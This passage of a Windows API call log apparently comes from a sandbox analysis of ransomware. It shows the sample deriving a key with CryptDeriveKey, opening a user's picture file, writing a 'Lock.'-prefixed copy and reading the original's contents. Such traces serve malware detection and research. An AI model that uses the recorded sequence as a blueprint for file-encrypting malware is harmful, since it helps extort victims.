lpMsg=0x8cef58) returned 0 [0210.080] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.080] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0210.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab3f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0210.081] CryptHashData (hHash=0x9e1d38, pbData=0x2a71d18, dwDataLen=0x3, dwFlags=0x1) returned 1 [0210.081] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.081] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.081] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.081] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.081] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.081] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.081] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.081] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.081] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.081] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.081] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.081] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.081] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.081] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0210.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab1a0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0210.081] CryptDeriveKey (in: hProv=0xa7c3b8, Algid=0x6601, hBaseData=0x9e1d38, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2078) returned 1 [0210.081] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.082] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.082] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.082] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.082] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.082] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.082] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.082] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0210.082] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.082] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0210.082] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0210.082] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0210.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6ee0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0210.082] CryptDestroyHash (hHash=0x9e1d38) returned 1 [0210.082] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.082] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.082] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.082] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.082] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.083] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/FS3WVwrvnLekT9.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\fs3wvwrvnlekt9.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0210.084] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.084] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0210.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7100 [0210.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0210.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.084] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0210.085] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0210.085] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0210.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0210.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0210.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0210.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0210.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0210.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0210.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0210.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0210.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a73e30 [0210.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.086] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0210.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73e30 | out: hHeap=0x2af0000) returned 1 [0210.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0210.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a938 [0210.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0210.086] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.FS3WVwrvnLekT9.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.fs3wvwrvnlekt9.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0210.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0210.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0210.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0210.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0210.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0210.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0210.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0210.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0210.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0210.089] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0210.089] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e7020 [0210.091] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0210.091] ReadFile (in: hFile=0x4dc, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0xfb7e, lpOverlapped=0x0) returned 1 [0210.094] ReadFile (in: hFile=0x4dc, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0210.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfb7e) returned 0x2aae878 [0210.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e7020 | out: hHeap=0x2af0000) returned 1 [0210.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0210.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0210.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfb7e) returned 0x2abe400 [0210.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0210.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.100] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0210.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0210.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfb7e) returned 0x2aae878 [0210.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0210.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0210.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.100] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0210.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0210.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0210.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0210.101] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0210.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0210.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0210.101] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0210.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0210.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b28 [0210.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0210.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xfb7e) returned 0x2aae878 [0210.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b18 [0210.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 